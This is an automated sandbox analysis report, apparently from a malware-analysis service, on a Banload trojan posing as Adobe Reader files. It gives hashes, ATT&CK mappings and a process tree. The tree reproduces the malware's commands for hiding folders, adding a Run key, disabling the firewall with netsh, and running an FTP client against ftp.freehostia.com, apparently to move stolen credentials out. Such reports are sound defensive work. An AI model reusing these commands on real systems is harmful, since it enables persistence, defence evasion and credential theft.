banload | f881941f711f3d797027dede73b477345f361838d24bf08e558f11db0f58cd19

Analysis

max time kernel
142s
max time network
144s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
12-09-2024 03:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f881941f711f3d797027dede73b477345f361838d24bf08e558f11db0f58cd19.exe
Size

2.3MB
MD5

002ed11af9c78566710fdd1debd21644
SHA1

d9c44fc6c474dacb0ec735cfc0a789f5fd20f5a0
SHA256

f881941f711f3d797027dede73b477345f361838d24bf08e558f11db0f58cd19
SHA512

f0f8af4f96d3e72ea21a7203d1837aa50f1b39f5fb70c7e39bd6b18e3eb6ee7c2b193c2d323f30c8c37c58dfa79f364501cecae4b26454c1120332470eea412e
SSDEEP

49152:Ipgs8ABpNAcbBicSTgbDgtcBbWRzfYb/kL+agsNFCriQmew54a31Ft:IGs8AvNzXgtcpEfFFC2QVbaXt

Score

10^/10

banload collection credential_access discovery downloader dropper evasion persistence privilege_escalation spyware stealer trojan

Malware Config

Signatures

Banload
Banload variants download malicious files, then install and execute the files.
trojan dropper downloader banload
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

adbr01.exeadbr02.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	adbr01.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	adbr02.exe

Modifies Windows Firewall 2 TTPs 4 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exe

pid	Process
4732	netsh.exe
1664	netsh.exe
1600	netsh.exe
1556	netsh.exe

Sets file to hidden 1 TTPs 5 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	Process
4400	attrib.exe
4876	attrib.exe
3540	attrib.exe
4860	attrib.exe
1360	attrib.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

adbr01.exeadbr02.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	adbr01.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	adbr01.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	adbr02.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	adbr02.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

f881941f711f3d797027dede73b477345f361838d24bf08e558f11db0f58cd19.exeWScript.execmd.exeWScript.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	f881941f711f3d797027dede73b477345f361838d24bf08e558f11db0f58cd19.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 7 IoCs

Processes:

Adobeta.exeadbr01.exeadbr01.exeadbr02.exeadbr02.exeAdobeta.exeAReader.exe

pid	Process
3268	Adobeta.exe
4928	adbr01.exe
2604	adbr01.exe
2724	adbr02.exe
4908	adbr02.exe
3460	Adobeta.exe
2028	AReader.exe

Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

adbr02.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	adbr02.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeA = "C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\Adobe Inc\\AdobeRead\\acro4.bat"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exenetsh.exenetsh.exenetsh.exe

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 24 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

reg.exeadbr02.exeipconfig.exeadbr02.execmd.exeattrib.exeattrib.exeWScript.execmd.exeadbr01.exeAdobeta.exeAReader.exef881941f711f3d797027dede73b477345f361838d24bf08e558f11db0f58cd19.exexcopy.exeattrib.exeattrib.exeAdobeta.exeadbr01.exenetsh.exenetsh.exeWScript.exeattrib.exenetsh.exenetsh.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	adbr02.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	adbr02.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	adbr01.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Adobeta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AReader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f881941f711f3d797027dede73b477345f361838d24bf08e558f11db0f58cd19.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Adobeta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	adbr01.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

xcopy.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

Processes:

ipconfig.exe

pid	Process
1312	ipconfig.exe

Modifies registry class 18 IoCs

Processes:

f881941f711f3d797027dede73b477345f361838d24bf08e558f11db0f58cd19.exeadbr01.execmd.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	f881941f711f3d797027dede73b477345f361838d24bf08e558f11db0f58cd19.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\12.0.0.0\RuntimeVersion = "v2.0.50727"	adbr01.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ProgID	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ = "Application Class"	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\Assembly = "Microsoft.Office.Interop.OneNote, Version=12.0.0.0, Culture=neutral, PublicKeyToken=71E9BCE111E9429C"	adbr01.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\LocalServer32	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\LocalServer32\ = "C:\\Program Files\\Microsoft Office\\Root\\Office16\\ONENOTE.EXE"	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ProgID\ = "OneNote.Application.12"	adbr01.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\TypeLib	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\TypeLib\ = "{F2A7EE29-8BF6-4a6d-83F1-098E366C709C}"	adbr01.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\RuntimeVersion = "v2.0.50727"	adbr01.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\12.0.0.0	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\12.0.0.0\Assembly = "Microsoft.Office.Interop.OneNote, Version=12.0.0.0, Culture=neutral, PublicKeyToken=71E9BCE111E9429C"	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\12.0.0.0\Class = "Microsoft.Office.Interop.OneNote.ApplicationClass"	adbr01.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\Class = "Microsoft.Office.Interop.OneNote.ApplicationClass"	adbr01.exe

NTFS ADS 3 IoCs

Processes:

adbr01.exeadbr02.exe

description	ioc	Process
File opened for modification	C:\ProgramData\TEMP:663565B1	adbr01.exe
File opened for modification	C:\ProgramData\TEMP:663565B1	adbr02.exe
File created	C:\ProgramData\TEMP:663565B1	adbr01.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

adbr01.exeadbr02.exe

description	pid	Process
Token: 33	2604	adbr01.exe
Token: SeIncBasePriorityPrivilege	2604	adbr01.exe
Token: 33	2604	adbr01.exe
Token: SeIncBasePriorityPrivilege	2604	adbr01.exe
Token: SeDebugPrivilege	2604	adbr01.exe
Token: 33	4908	adbr02.exe
Token: SeIncBasePriorityPrivilege	4908	adbr02.exe
Token: 33	4908	adbr02.exe
Token: SeIncBasePriorityPrivilege	4908	adbr02.exe
Token: SeDebugPrivilege	4908	adbr02.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

f881941f711f3d797027dede73b477345f361838d24bf08e558f11db0f58cd19.exeWScript.execmd.exeWScript.execmd.exeadbr01.exe

description	pid	Process	procid_target
PID 1484 wrote to memory of 3512	1484	f881941f711f3d797027dede73b477345f361838d24bf08e558f11db0f58cd19.exe	86
PID 1484 wrote to memory of 3512	1484	f881941f711f3d797027dede73b477345f361838d24bf08e558f11db0f58cd19.exe	86
PID 1484 wrote to memory of 3512	1484	f881941f711f3d797027dede73b477345f361838d24bf08e558f11db0f58cd19.exe	86
PID 3512 wrote to memory of 3912	3512	WScript.exe	87
PID 3512 wrote to memory of 3912	3512	WScript.exe	87
PID 3512 wrote to memory of 3912	3512	WScript.exe	87
PID 3912 wrote to memory of 232	3912	cmd.exe	94
PID 3912 wrote to memory of 232	3912	cmd.exe	94
PID 3912 wrote to memory of 232	3912	cmd.exe	94
PID 3912 wrote to memory of 3540	3912	cmd.exe	95
PID 3912 wrote to memory of 3540	3912	cmd.exe	95
PID 3912 wrote to memory of 3540	3912	cmd.exe	95
PID 3912 wrote to memory of 4860	3912	cmd.exe	97
PID 3912 wrote to memory of 4860	3912	cmd.exe	97
PID 3912 wrote to memory of 4860	3912	cmd.exe	97
PID 3912 wrote to memory of 1360	3912	cmd.exe	98
PID 3912 wrote to memory of 1360	3912	cmd.exe	98
PID 3912 wrote to memory of 1360	3912	cmd.exe	98
PID 3912 wrote to memory of 4400	3912	cmd.exe	99
PID 3912 wrote to memory of 4400	3912	cmd.exe	99
PID 3912 wrote to memory of 4400	3912	cmd.exe	99
PID 3912 wrote to memory of 4876	3912	cmd.exe	100
PID 3912 wrote to memory of 4876	3912	cmd.exe	100
PID 3912 wrote to memory of 4876	3912	cmd.exe	100
PID 3912 wrote to memory of 5076	3912	cmd.exe	101
PID 3912 wrote to memory of 5076	3912	cmd.exe	101
PID 3912 wrote to memory of 5076	3912	cmd.exe	101
PID 5076 wrote to memory of 552	5076	WScript.exe	102
PID 5076 wrote to memory of 552	5076	WScript.exe	102
PID 5076 wrote to memory of 552	5076	WScript.exe	102
PID 552 wrote to memory of 3268	552	cmd.exe	104
PID 552 wrote to memory of 3268	552	cmd.exe	104
PID 552 wrote to memory of 3268	552	cmd.exe	104
PID 552 wrote to memory of 3384	552	cmd.exe	105
PID 552 wrote to memory of 3384	552	cmd.exe	105
PID 552 wrote to memory of 3384	552	cmd.exe	105
PID 552 wrote to memory of 1312	552	cmd.exe	106
PID 552 wrote to memory of 1312	552	cmd.exe	106
PID 552 wrote to memory of 1312	552	cmd.exe	106
PID 552 wrote to memory of 4928	552	cmd.exe	107
PID 552 wrote to memory of 4928	552	cmd.exe	107
PID 552 wrote to memory of 4928	552	cmd.exe	107
PID 4928 wrote to memory of 2604	4928	adbr01.exe	108
PID 4928 wrote to memory of 2604	4928	adbr01.exe	108
PID 4928 wrote to memory of 2604	4928	adbr01.exe	108
PID 4928 wrote to memory of 2604	4928	adbr01.exe	108
PID 4928 wrote to memory of 2604	4928	adbr01.exe	108
PID 4928 wrote to memory of 2604	4928	adbr01.exe	108
PID 4928 wrote to memory of 2604	4928	adbr01.exe	108
PID 4928 wrote to memory of 2604	4928	adbr01.exe	108
PID 4928 wrote to memory of 2604	4928	adbr01.exe	108
PID 4928 wrote to memory of 2604	4928	adbr01.exe	108
PID 4928 wrote to memory of 2604	4928	adbr01.exe	108
PID 4928 wrote to memory of 2604	4928	adbr01.exe	108
PID 4928 wrote to memory of 2604	4928	adbr01.exe	108
PID 4928 wrote to memory of 2604	4928	adbr01.exe	108
PID 4928 wrote to memory of 2604	4928	adbr01.exe	108
PID 4928 wrote to memory of 2604	4928	adbr01.exe	108
PID 4928 wrote to memory of 2604	4928	adbr01.exe	108
PID 4928 wrote to memory of 2604	4928	adbr01.exe	108
PID 4928 wrote to memory of 2604	4928	adbr01.exe	108
PID 4928 wrote to memory of 2604	4928	adbr01.exe	108
PID 4928 wrote to memory of 2604	4928	adbr01.exe	108
PID 4928 wrote to memory of 2604	4928	adbr01.exe	108

Views/modifies file attributes 1 TTPs 5 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	Process
4860	attrib.exe
1360	attrib.exe
4400	attrib.exe
4876	attrib.exe
3540	attrib.exe

C:\Users\Admin\AppData\Local\Temp\f881941f711f3d797027dede73b477345f361838d24bf08e558f11db0f58cd19.exe
"C:\Users\Admin\AppData\Local\Temp\f881941f711f3d797027dede73b477345f361838d24bf08e558f11db0f58cd19.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1484
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3512
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat" /quiet /passive /norestart"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:3912
  - - C:\Windows\SysWOW64\xcopy.exe
      xcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\"
      4⤵
      System Location Discovery: System Language Discovery
      Enumerates system info in registry
      PID:232
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:3540
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:4860
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:1360
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:4400
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:4876
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adob9.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:5076
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\rea01.bat" /quiet /passive /norestart"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:552
      - C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe
        
        Adobeta.exe -a -c -d -natpasv -s:01.klm ftp.freehostia.com -s
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3268
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "AdobeA" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\acro4.bat"
        6⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:3384
      - C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /all
        6⤵
        System Location Discovery: System Language Discovery
        Gathers network information
        
        PID:1312
      - C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
        
        adbr01.exe -f "011.011"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4928
        
        C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
        
        adbr01.exe -f "011.011"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies registry class
        NTFS ADS
        Suspicious use of AdjustPrivilegeToken
        
        PID:2604
      - C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe
        
        adbr02.exe -f "112.112"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2724
        
        C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe
        
        adbr02.exe -f "112.112"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        NTFS ADS
        Suspicious use of AdjustPrivilegeToken
        
        PID:4908
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall set opmode disable
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:1664
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall set currentprofile state off
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:1600
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall set profiles state off
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:1556
      - C:\Windows\SysWOW64\netsh.exe
        
        NetSh Advfirewall set allprofiles state off
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:4732
      - C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe
        
        Adobeta.exe -a -c -d -natpasv -s:004.afq ftp.freehostia.com
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3460
      - C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe
        
        AReader 5400
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2028

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Licenses\086A4C8982A52E70F.Lic

Filesize
140B

MD5
9354c939403ff7a4a0c994c93ceafc76

SHA1
04206f86c12620ceb00c831d74f14f8abad7772a

SHA256
2e1974a455099f928bee219369c865b823ee7cd050e59517b59b46bca02a8761

SHA512
b10994c1579b1c2e3fa29916f9ba7262b665a94bddda32bf45235bebe59a3487a81bae7c79b14b074011b4df62ce1bf6b81fa6f5d32cacdb72a09c9803f31adb

Download Submit
C:\ProgramData\TEMP:663565B1

Filesize
140B

MD5
79a6d1268b307784efd2111b43363608

SHA1
42e2c07b528bd2b13074d2d47f8b7eb3826e6b0d

SHA256
62571449f9e51f2fb8e6cdd616fa1efd81bdb6f4855276275c1b175d733cbe92

SHA512
f1de70cd33637ba84d4680b132626ffcad8571a7af73d23566ecbfd932d9d8d0c3fbc655544760043d618ce1261aa0310e138a2e39acb3af5761725b38a0098c

Download Submit
C:\ProgramData\TEMP\RAIDTest

Filesize
4B

MD5
c2f09542b6c7daf4288f3524c8cebb18

SHA1
9430b21baf07f0d105b9ee5fdd9f868418454517

SHA256
55d7808233c58f1606fff77eb382a02ed729bf5d8b2640fb313d0f7c91e970d4

SHA512
dcc19cfbc78b78708ce2586228424194f846d80b6d072045baaf93559d20f71e809a4eb57e7dac3b4ea109d90aeb585d0b5438dc1dd7d34054c03aa6350d6672

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\004.afq

Filesize
121B

MD5
3599c797ad0bf899791bfa24413c3ab6

SHA1
215a520638bb3f1336f268d1acc1170bf2ce0768

SHA256
0a9963eefd15805efaef32bf961b354fc255a5a23b4d466aa8e94df53a3c3e8c

SHA512
add003202c97629f2d87d4b7f1876d79dc1ae35cfc85fc55e578adbc3cc009e41ca42c66f33521acb5d8a651fe31d69de5699af1df82ada8227bbeeddbe8d5d1

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\AReader.exe

Filesize
124KB

MD5
1a1075e5e307f3a4b8527110a51ce827

SHA1
f453838ed21020b7ca059244feea8579e5aa74ef

SHA256
ddd90e3546e95b0991df26a17cf26fa2f1c20d6a1fd4ffccf1e9b3ec3d3810d5

SHA512
b6b70c6cb3cdb05a69c75b86c1fa0fadb38de0391e1fa17daff7d12dfae2a9f483546d9bf1001ff622694fdf8a28b85cd30fc541c25be62df022d22ca17decc1

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat

